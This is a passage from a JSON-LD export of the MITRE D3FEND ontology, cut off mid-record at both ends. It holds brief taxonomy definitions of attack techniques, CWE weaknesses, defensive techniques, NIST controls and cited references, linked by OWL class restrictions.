        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.006",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)",
      "d3f:modifies": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "rdfs:label": "Dynamic Linker Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Nb3c51a72baaf43318b16c9df3a6a627b"
        }
      ]
    },
    {
      "@id": "_:Nb3c51a72baaf43318b16c9df3a6a627b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "d3f:T1566.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1566.003",
      "d3f:definition": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.",
      "d3f:produces": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Spearphishing via Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1566"
        },
        {
          "@id": "_:N43620e74bb0042d4ac6c2d9511ad2ee2"
        },
        {
          "@id": "_:N10688bb60fd84c4897caa2e3f9de4e4b"
        }
      ]
    },
    {
      "@id": "_:N43620e74bb0042d4ac6c2d9511ad2ee2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N10688bb60fd84c4897caa2e3f9de4e4b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:PE32ExecutableFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "rdfs:label": "PE32 Executable File"
    },
    {
      "@id": "d3f:CWE-494",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-494",
      "d3f:definition": "The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.",
      "rdfs:label": "Download of Code Without Integrity Check",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-345"
        },
        {
          "@id": "d3f:CWE-669"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "d3f:control-name": "Vulnerability Monitoring and Scanning",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "RA-5"
    },
    {
      "@id": "d3f:T1474.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474.002",
      "d3f:definition": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system.",
      "rdfs:label": "Compromise Hardware Supply Chain - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1474"
      },
      "skos:prefLabel": "Compromise Hardware Supply Chain"
    },
    {
      "@id": "d3f:Access",
      "@type": "owl:Class",
      "rdfs:label": "Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Action"
        },
        {
          "@id": "_:N56747a40f296459a82602b5281b2ee14"
        },
        {
          "@id": "_:Ne4714a457f334041b6e21fe7debca57f"
        }
      ]
    },
    {
      "@id": "_:N56747a40f296459a82602b5281b2ee14",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "_:Ne4714a457f334041b6e21fe7debca57f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-mediator"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessMediator"
      }
    },
    {
      "@id": "dcterms:license",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:RemoteFileAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RemoteFileAccessMediation"
      ],
      "d3f:d3fend-id": "D3-RFAM",
      "d3f:definition": "Remote file access mediation is the process of managing and securing access to file systems over a network to ensure that only authorized users or processes can interact with remote files.",
      "d3f:isolates": {
        "@id": "d3f:File"
      },
      "d3f:kb-article": "## How it works\n\nRemote File Access Mediation focuses on controlling how users or processes access file systems from remote locations. This involves ensuring secure connections, often through protocols like SFTP or SMB, and enforcing permissions to prevent unauthorized access or data breaches. Examples of enforcement areas include accessing shared drives or cloud storage from remote offices or home networks.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:synonym": "File Share Access Mediation",
      "rdfs:label": "Remote File Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkResourceAccessMediation"
        },
        {
          "@id": "_:N7bfa9ea5d0b64407b765bb20f8719be9"
        }
      ]
    },
    {
      "@id": "_:N7bfa9ea5d0b64407b765bb20f8719be9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1628.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628.001",
      "d3f:definition": "A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.",
      "rdfs:label": "Suppress Application Icon - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1628"
      },
      "skos:prefLabel": "Suppress Application Icon"
    },
    {
      "@id": "d3f:T1552.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1552.007",
      "d3f:definition": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)",
      "rdfs:label": "Container API",
      "rdfs:subClassOf": {
        "@id": "d3f:T1552"
      }
    },
    {
      "@id": "d3f:WatchdogTimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "A watchdog timer event is any occurrence in which a watchdog timer is started, updated, reset, expired, or otherwise interacts with the system it monitors, resulting in a state change, status report, or corrective action intended to detect, signal, or recover from abnormal or stalled system behavior.",
      "rdfs:label": "Watchdog Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TimerEvent"
        },
        {
          "@id": "_:Na2e21c0b6f834274b560af9f00ef377c"
        }
      ]
    },
    {
      "@id": "_:Na2e21c0b6f834274b560af9f00ef377c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WatchdogTimer"
      }
    },
    {
      "@id": "d3f:T0895",
      "@type": "owl:Class",
      "d3f:attack-id": "T0895",
      "d3f:definition": "Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating systems configurations to mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor.",
      "rdfs:label": "Autorun Image - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Autorun Image"
    },
    {
      "@id": "d3f:AuthenticationServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:AuthenticationServiceApplication"
      },
      "d3f:definition": "An authentication server provides a network service that applications use to authenticate the credentials, usually account names and passwords, of their users. When a client submits a valid set of credentials, it receives a cryptographic ticket that it can subsequently use to access various services. Major authentication algorithms include passwords, Kerberos, and public key encryption.",
      "d3f:manages": {
        "@id": "d3f:AuthenticationService"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Authentication_server"
      },
      "rdfs:label": "Authentication Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:Nb9039f350f1448d6bb8f0eb83b2683df"
        },
        {
          "@id": "_:N1419680f2ed547a0a7296ae8db9f275a"
        }
      ]
    },
    {
      "@id": "_:Nb9039f350f1448d6bb8f0eb83b2683df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationServiceApplication"
      }
    },
    {
      "@id": "_:N1419680f2ed547a0a7296ae8db9f275a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:StringPatternMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SPM",
      "d3f:definition": "String pattern-matching algorithms, also known as string-matching algorithms, are an important class of string algorithms that try to find a place where one or several strings (also called patterns) are found within a larger string or text.",
      "d3f:kb-article": "## How it works\nA basic example of string searching is when the pattern and the searched text are arrays of elements of an alphabet (finite set) Σ. Σ may be a human language alphabet, for example, the letters A through Z; other applications may use a binary alphabet (Σ = {0,1}) or a DNA alphabet (Σ = {A,C,G,T}) in bioinformatics.\n\nIn practice, the choice of a feasible string-search algorithm may be affected by the string encoding. In particular, if a variable-width encoding is in use, then it may be slower to find the Nth character, perhaps requiring time proportional to N. This may significantly slow some search algorithms. One of many possible solutions is to search for the sequence of code units instead, but doing so may produce false matches unless the encoding is specifically designed to avoid it.\n\n## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)",
      "rdfs:label": "String Pattern Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PatternMatching"
      }
    },
    {
      "@id": "d3f:D3FENDKBThing",
      "@type": "owl:Class",
      "rdfs:label": "D3FEND KB Thing"
    },
    {
      "@id": "d3f:Dyna-Q",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DQ",
      "d3f:definition": "A Dyna-Q agent combines acting, learning, and planning.",
      "d3f:kb-article": "## References\nCompNeuro Neuromatch Academy Tutorials. [Link](https://compneuro.neuromatch.io/tutorials/W3D4_ReinforcementLearning/student/W3D4_Tutorial4.html)",
      "rdfs:label": "Dyna-Q",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-basedReinforcementLearning"
      }
    },
    {
      "@id": "d3f:NetworkProtocolAnalyzer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Monitors and parses network protocols to extract values from various network protocol layers.",
      "d3f:monitors": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Network Protocol Analyzer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkSensor"
        },
        {
          "@id": "_:Nc7d2301646794a9d874076349f00eb8f"
        }
      ]
    },
    {
      "@id": "_:Nc7d2301646794a9d874076349f00eb8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:REC-0001.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.02",
      "d3f:definition": "Firmware intelligence covers microcontroller images, programmable logic bitstreams, boot ROM behavior, peripheral configuration blobs, and anti-rollback or secure-boot settings for devices on the bus. Knowing device types, versions, and footprints enables inference of default passwords, debug interfaces (JTAG, SWD, UART), timing tolerances, and error handling under brownout or thermal stress. A threat actor may obtain firmware from vendor reference packages, public evaluation boards, leaked manufacturing files, over-the-air update images, or crash dumps. Correlating that with board layouts, harness drawings, or part markings helps map trust boundaries and locate choke points like power controllers, bus bridges, and watchdog supervisors. Attack goals include: preparing malicious but apparently valid updates, exploiting unsigned or weakly verified images, forcing downgrades, or manipulating configuration fuses to weaken later defenses. Even when cryptographic verification is present, knowledge of recovery modes, boot-pin strapping, or maintenance commands can offer alternate paths.",
      "rdfs:label": "Firmware - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Firmware"
    },
    {
      "@id": "d3f:CWE-683",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-683",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Order of Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:MachineLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ML",
      "d3f:definition": "Machine learning techniques are computational methods that combine statistics, probability, and optimization to make accurate predictions and/or improve performance.",
      "d3f:kb-article": "## References\n\"Machine learning.\" Wikipedia. [Link](https://en.wikipedia.org/wiki/Machine_learning).",
      "rdfs:label": "Machine Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticTechnique"
      }
    },
    {
      "@id": "d3f:T1628.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628.003",
      "d3f:definition": "Adversaries may attempt to hide multimedia files from the user. By doing so, adversaries may conceal captured files, such as pictures, videos and/or screenshots, then later exfiltrate those files.",
      "rdfs:label": "Conceal Multimedia Files - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1628"
      },
      "skos:prefLabel": "Conceal Multimedia Files"
    },
    {
      "@id": "d3f:T1096",
      "@type": "owl:Class",
      "d3f:attack-id": "T1096",
      "d3f:definition": "Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.004",
      "rdfs:label": "NTFS File Attributes",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1001",
      "d3f:definition": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Data Obfuscation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N7a4058f563394fdba89ee6982b97ef05"
        }
      ]
    },
    {
      "@id": "_:N7a4058f563394fdba89ee6982b97ef05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1629",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629",
      "d3f:definition": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.",
      "rdfs:label": "Impair Defenses - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Impair Defenses"
    },
    {
      "@id": "d3f:T1055.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:OperatingSystemFile"
      },
      "d3f:attack-id": "T1055.009",
      "d3f:definition": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:may-modify": {
        "@id": "d3f:OperatingSystemFile"
      },
      "rdfs:label": "Proc Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N365530aa453f4f5b8b752ee8c473d99e"
        },
        {
          "@id": "_:N7c75f932c29b4ca0b8f5a989b26dc3bd"
        }
      ]
    },
    {
      "@id": "_:N365530aa453f4f5b8b752ee8c473d99e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "_:N7c75f932c29b4ca0b8f5a989b26dc3bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:ProtocolMetadataAnomalyDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProtocolMetadataAnomalyDetection"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-PMAD",
      "d3f:definition": "Collecting network communication protocol metadata and identifying statistical outliers.",
      "d3f:kb-article": "## How it works\nNetwork protocol metadata is first collected and processed in real-time or post-facto. Metadata may include packet header information or information about a session (ex. time between requests/responses). Metadata is then grouped based on shared characteristics and those groups are compared to each other. If particular metadata differs significantly from other data, an alert is generated, identifying the network event as anomalous. Anomalous activity may indicate unauthorized activity.\n\n## Considerations\nMetadata collection on enterprises can yield large data sets. Storage, indexing, querying, and aging should be considered prior to implementation.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingMetadataVectors_VECTRANETWORKSInc"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingPassiveClusterMapping_VectraNetworksInc"
        },
        {
          "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingDailyNetworkTrafficCommunityOutliers_VECTRANETWORKSInc"
        }
      ],
      "rdfs:label": "Protocol Metadata Anomaly Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N8777a0562b7641fbbfdcc6bf60fde743"
        }
      ]
    },
    {
      "@id": "_:N8777a0562b7641fbbfdcc6bf60fde743",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1569",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569",
      "d3f:definition": "This technique has been deprecated.",
      "rdfs:label": "System Services",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:LM-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0005",
      "d3f:definition": "The adversary pivots across partitions by abusing the mechanisms a separation kernel or hypervisor exposes for inter-partition communication and device sharing. Paths include message ports/queues, shared-memory windows, virtual NICs and bridges, hypercalls, and common driver backends (e.g., storage or DMA engines without strict IOMMU bounds). A foothold in a less-trusted partition, often a payload or guest OS, can be turned into access to a higher-privilege domain by crafting traffic that exploits parser flaws in port services, racing management channels, or coercing backend drivers to perform out-of-bounds operations. Once the boundary is crossed, the actor can reach bus gateways, file systems, or control applications hosted in adjacent partitions and continue movement under the guise of permitted inter-partition exchanges.",
      "rdfs:label": "Virtualization Escape - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Virtualization Escape"
    },
    {
      "@id": "d3f:comments",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "d3f:definition": "x comments y: x claim has provider comments y.",
      "rdfs:label": "comments",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:REC-0005.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.02",
      "d3f:definition": "Downlink collection aims to harvest housekeeping telemetry, event logs, ephemerides, payload data, and operator annotations that reveal system state and procedures. Even when payload content is encrypted, ancillary channels (beacons, health/status, low-rate engineering downlink) can disclose mode transitions, battery and thermal margins, safing events, and next-pass predictions. Community ground networks and public dashboards may inadvertently provide stitched datasets that make trend analysis trivial. Captured framing and coding parameters also help an adversary build testbeds and refine timing for later actions.",
      "rdfs:label": "Downlink Intercept - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Downlink Intercept"
    },
    {
      "@id": "d3f:AML.T0087",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0087",
      "d3f:definition": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, photos, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation, [Search Victim-Owned Websites](/techniques/AML.T0003), or via leaked information on the black market.\n\nAdversaries may use the gathered victim data to Create Deepfakes and impersonate them in a convincing manner. This may create opportunities for adversaries to [Establish Accounts](/techniques/AML.T0021) under the impersonated identity, or allow them to perform convincing [Phishing](/techniques/AML.T0052) attacks.",
      "rdfs:label": "Gather Victim Identity Information - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0087"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Victim Identity Information"
    },
    {
      "@id": "d3f:CWE-158",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-158",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Null Byte or NUL Character",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1113",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1113",
      "d3f:definition": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)",
      "d3f:may-access": {
        "@id": "d3f:DisplayServer"
      },
      "d3f:may-invoke": {
        "@id": "d3f:GetScreenCapture"
      },
      "rdfs:label": "Screen Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nf9cb43c6e4d2480389f99aa7111655fb"
        },
        {
          "@id": "_:Nedc2de1e5f37440593a5084253287979"
        }
      ]
    },
    {
      "@id": "_:Nf9cb43c6e4d2480389f99aa7111655fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DisplayServer"
      }
    },
    {
      "@id": "_:Nedc2de1e5f37440593a5084253287979",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetScreenCapture"
      }
    },
    {
      "@id": "d3f:T0807",
      "@type": "owl:Class",
      "d3f:attack-id": "T0807",
      "d3f:definition": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.",
      "rdfs:label": "Command-Line Interface - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Command-Line Interface"
    },
    {
      "@id": "d3f:OTControlCommand",
      "@type": "owl:Class",
      "d3f:definition": "Command and control the managed process.",
      "rdfs:comment": [
        "CIP: Reset\nCIP: Start\nCIP: Stop\nCIP: Create\nCIP: Delete\nCIP: Apply Attributes\nCIP: Restore\nCIP: Save ",
        "GE-SRTP: PLC SHORT STATUS REQUEST"
      ],
      "rdfs:label": "OT Control Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:Reference-RFC7489-Domain-basedMessageAuthentication-Reporting-AndConformance-DMARC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc7489"
      },
      "d3f:kb-abstract": "Domain-based Message Authentication, Reporting, and Conformance(DMARC) is a scalable mechanism by which a mail-originating organization can express domain-level policies and preferences for message validation, disposition, and reporting, that a mail-receiving organization can use to improve mail handling.\n\nOriginators of Internet Mail need to be able to associate reliable and authenticated domain identifiers with messages, communicate policies about messages that use those identifiers, and report about mail using those identifiers.  These abilities have several benefits: Receivers can provide feedback to Domain Owners about the use of their domains; this feedback can provide valuable insight about the management of internal operations and the presence of external domain name abuse.\n\nDMARC does not produce or encourage elevated delivery privilege of authenticated email. DMARC is a mechanism for policy distribution that enables increasingly strict handling of messages that fail authentication checks, ranging from no action, through altered\ndelivery, up to message rejection.",
      "d3f:kb-author": "M. Kucherawy, E. Zwicky",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:TransferAgentAuthentication"
      },
      "d3f:kb-reference-title": "RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC)",
      "rdfs:label": "Reference - RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC) - IETF"
    },
    {
      "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190034641A1"
      },
      "d3f:kb-abstract": "The present disclosure is directed to a system, method, and computer program for detecting and assessing security risks in an enterprise's computer network. A behavior model is built for a user in the network based on the user's interactions with the network, wherein a behavior model for a user indicates client device(s), server(s), and resources used by the user. The user's behavior during a period of time is compared to the user's behavior model. A risk assessment is calculated for the period of time based at least in part on the comparison between the user's behavior and the user's behavior model, wherein any one of certain anomalies between the user's behavior and the user's behavior model increase the risk assessment.",
      "d3f:kb-author": "Sylvain Gil; Domingo Mihovilovic; Nir Polak; Magnus Stensmo; Sing Yip",
      "d3f:kb-mitre-analysis": "This patent describes calculating a risk score to detect anomalies in user activity based on comparing a user's current session with a user behavior model. The user behavior model is comprised of a number of histograms including:\n\n* client devices from which the user logs in\n* servers accessed\n* data accessed\n* applications accessed\n* session duration\n* logon time of day\n* logon day of week\n* geo - location of logon origination\n\nThe system has an initial training period with x number of days (e. g., 90 days) in which session data is recorded in behavior models before behavior analysis begins.The histograms are then used to determine anomalies between current session activity and a user's behavior model. Values for a histogram category are along one axis and the number of times the value is received for the category is along another axis. If a data point value associated with the current user session is over an anomaly threshold, an alert is generated.",
      "d3f:kb-organization": "Exabeam Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SessionDurationAnalysis"
        },
        {
